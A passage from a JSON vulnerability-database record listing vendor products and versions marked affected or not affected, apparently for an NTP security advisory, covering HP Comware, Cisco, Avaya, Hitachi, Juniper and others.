"scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "hi (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "55005)0" }, { "model": "ei (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "55005)0" }, { "model": "si (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "51205)0" }, { "model": "ei (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "51205)0" }, { "model": "4800g (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "4500g (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "4210g (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "(comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "36105)0" }, { "model": "(comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3600v25)0" }, { "model": "(comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3100v2-485)0" }, { "model": "(comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3100v25)0" }, { "model": "(comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "125005)0" }, { "model": "(comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "105005)0" }, { "model": "enterprise server ap8800", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0" }, { "model": "enterprise server ap7000", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0" }, { "model": "bladesymphony cb500 series", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0" }, { "model": "bladesymphony cb320 series", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0" }, { "model": "bladesymphony cb2500 series", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0" }, { "model": "bladesymphony cb2000 series", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0" }, { "model": "bladesymphony bs500 series", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0" }, { "model": "bladesymphony bs320 series", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0" }, { "model": "bladesymphony bs2500 series", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0" }, { "model": "bladesymphony bs2000 series", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0" }, { "model": "bladesymphony bs1000 series", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0" }, { "model": "advanced server ha8000cr", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "0" }, { "model": "load balancer big-ip1500", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "0" }, { "model": "vipr srm", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "3.6.0" }, { "model": "m\u0026r", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "6.5" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "netscaler gateway", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "netscaler application delivery controller", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "wide area application services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex social", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex meetings server base", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.5" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.5" }, { "model": "webex meetings server 2.0mr2", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.0" }, { "model": "virtualization experience client", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "62150" }, { "model": "virtual systems operations center for vpe project", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "virtual security gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "videoscape conductor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "videoscape back office", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance media server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video delivery system recorder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "universal small cell ran management system wireless", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unity connection", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified sip proxy", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.6" }, { "model": "unified meetingplace", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified intelligence center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified contact center express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified communications domain manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ucs manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ucs invicta series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ucs director", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "transaction encryption device", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence tx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "telepresence te software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-370" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-320" }, { "model": "telepresence system series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "13000" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "11000" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10000" }, { "model": "telepresence profile series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence isdn link", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "13100" }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "service control engines system software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "scos", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "remote network control system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "remote conditional access system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "quantum son suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "quantum policy suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime service catalog virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime license manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime lan management solution", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime infrastructure", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "prime data center network manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime collaboration provisioning", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "powervu network center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "powervu d9190 conditional access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "powerkey encryption server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "physical access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "onepk all-in-one vm", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50000" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "40000" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1000v0" }, { "model": "network configuration and change management service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "network configuration and change management", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "netflow collection agent", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "media experience engines", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mds series multilayer switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "management heartbeat server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber guest", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "iptv service delivery system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ip interoperability and collaboration system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ios xr software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ios xr for cisco network convergence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "international digital network control system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "intelligent automation for cloud", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "im and presence service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "firesight system software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "finesse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "explorer controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "enterprise content delivery service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "encryption appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "emergency responder", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "dncs application server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "digital transport adapter control system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "digital network control system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "dcm series 9900-digital content manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "d9036 modular encoding platform", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "common services platform collector", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "common download server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "command server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "20000" }, { "model": "cloud object store", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence endpoints sx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence endpoints mxg2 series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence endpoints mx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence endpoints ex series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence endpoints c series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence endpoints 10\" touch panel", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ironport encryption appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "application policy infrastructure controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "autobackup server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "asa cx and cisco prime security manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "application networking manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "application and content networking system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "7" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "5" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "one-x client enablement services sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.0" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1.1" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "ip office application server sp", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.02" }, { "model": "ip office application server sp", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.01" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "cms r17", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1.0.9" }, { "model": "aura system platform sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.9.3" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.8.3" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.0.3" }, { "model": "aura system platform sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura system platform sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "aura system manager sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.5" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "aura system manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.5" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.3" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.2" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "aura presence services sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "aura experience portal sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura experience portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura conferencing", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "aura conferencing", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "aura conferencing standard", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura conferencing sp1 standard", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3.0" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53003.0" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.5" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.5" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.1" }, { "model": "network time protocol", "scope": "ne", "trust": 0.3, "vendor": "meinberg", "version": "4.2.8" }, { "model": "junos os 14.2r3", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 14.1x55-d16", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 14.1x50-d90", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 14.1r5", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 13.3r6", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 13.2r8", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 12.3x48-d15", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 12.3r9", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 12.1x47-d20", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 12.1x46-d35", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos os 12.1x44-d50", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "smartcloud entry fp", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.110" }, { "model": "wx5004-ei (comware r2507p35", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "vsr (comware r0204p01", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7)" }, { "model": "vcx", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "9.8.17" }, { "model": "(comware r1513p95", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "v19105)" }, { "model": "u200s and cs (comware f5123p31", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "u200a and m (comware f5123p31", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "smb1920 (comware r1106", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "smb1910 (comware r1108", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "smb (comware r1105", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "16205)" }, { "model": "secblade iii (comware r3820p03", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "secblade fw (comware r3181p05", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "msr50 ru r2513l61", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5" }, { "model": "msr50 g2 r2513l61", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5-" }, { "model": "msr50 epu ru r2513l61", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5" }, { "model": "msr50 r2513l61", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5-" }, { "model": "msr4000 (comware r0106p31", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7)" }, { "model": "msr316 ru r2513l61", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5" }, { "model": "msr301x ru r2513l61", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5" }, { "model": "msr3000 (comware r0106p31", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7)" }, { "model": "msr30-1x r2513l61", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5-" }, { "model": "msr30-16 r2513l61", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5-" }, { "model": "msr30 ru r2513l61", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5" }, { "model": "msr30 r2513l61", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5-" }, { "model": "msr2000 (comware r0106p31", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7)" }, { "model": "msr20-1x ru r2513l61", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5" }, { "model": "msr20-1x (comware r2513p45", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "msr20-1x r2513l61", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5-" }, { "model": "msr20 ru r2513l61", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5" }, { "model": "msr20 (comware r2513p45", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "msr20 r2513l61", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5-" }, { "model": "msr1000 ru r2513l61", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5" }, { "model": "msr1000 (comware r0106p31", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7)" }, { "model": "msr1000 (comware r2513p45", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "msr (comware r2513p45", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "9xx5)" }, { "model": "msr (comware r2513p45", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "93x5)" }, { "model": "msr 50-g2 (comware r2513p45", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "msr (comware r2513p45", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "505)" }, { "model": "msr (comware r2513p45", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "30-1x5)" }, { "model": "msr (comware r2513p45", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "30-165)" }, { "model": "msr (comware r2513p45", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "305)" }, { "model": 